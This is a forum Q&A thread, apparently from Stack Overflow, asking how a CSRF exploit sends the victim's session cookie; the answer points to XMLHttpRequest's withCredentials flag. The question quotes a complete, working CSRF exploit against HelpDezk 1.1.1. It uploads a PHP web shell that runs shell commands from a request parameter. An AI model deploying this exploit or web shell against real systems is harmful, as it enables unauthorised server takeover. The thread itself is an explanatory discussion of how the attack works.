anon

Reputation: 463

CSRF exploit and cookie

In the definition of CSRF we have

Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated.

That means it applies to the authenticated user, who already has a valid cookie for logging in to the user panel. But in every CSRF exploit that I've ever seen there is no cookie part or anything related; for example, this CSRF exploit:

<html>
  <body>
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http://192.168.228.186/helpdezk-1.1.1/admin/logos/upload2", true);
        xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------1883328331133778598415248998");
        xhr.withCredentials = true;
        var body = "-----------------------------1883328331133778598415248998\r\n" + 
          "Content-Disposition: form-data; name=\"file\"; filename=\"index.php\"\r\n" + 
          "Content-Type: text/php\r\n" + 
          "\r\n" + 
          "\x3c?php\n" + 
          "\n" + 
          "if(isset($_REQUEST[\'cmd\'])){\n" + 
          "        echo \"\x3cpre\x3e\";\n" + 
          "        $cmd = ($_REQUEST[\'cmd\']);\n" + 
          "        system($cmd);\n" + 
          "        echo \"\x3c/pre\x3e\";\n" + 
          "        die;\n" + 
          "}\n" + 
          "\n" + 
          "?\x3e\r\n" + 
          "-----------------------------1883328331133778598415248998--\r\n";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
    </script>
    <form action="#">
      <input type="button" value="Submit request" onclick="submitRequest();" />
    </form>
  </body>
</html>

The exploit uses AJAX to make a POST request, but as we know it needs to set a cookie too. I know that it executes on the user's side, but this request doesn't call any cookie from browser storage. How can it be possible? Thanks

Upvotes: 0

Views: 459

Answers (1)

Quentin

Reputation: 943097

the exploit uses ajax to make a post request, but as we know it needs to set a cookie too

It doesn't, and can't.

but this request doesn't call any cookie from browser storage

You're wrong. It does. Look at this:

xhr.withCredentials = true;

and the docs:

The XMLHttpRequest.withCredentials property is a Boolean that indicates whether or not cross-site Access-Control requests should be made using credentials such as cookies, authorization headers or TLS client certificates. Setting withCredentials has no effect on same-site requests.

Upvotes: 1
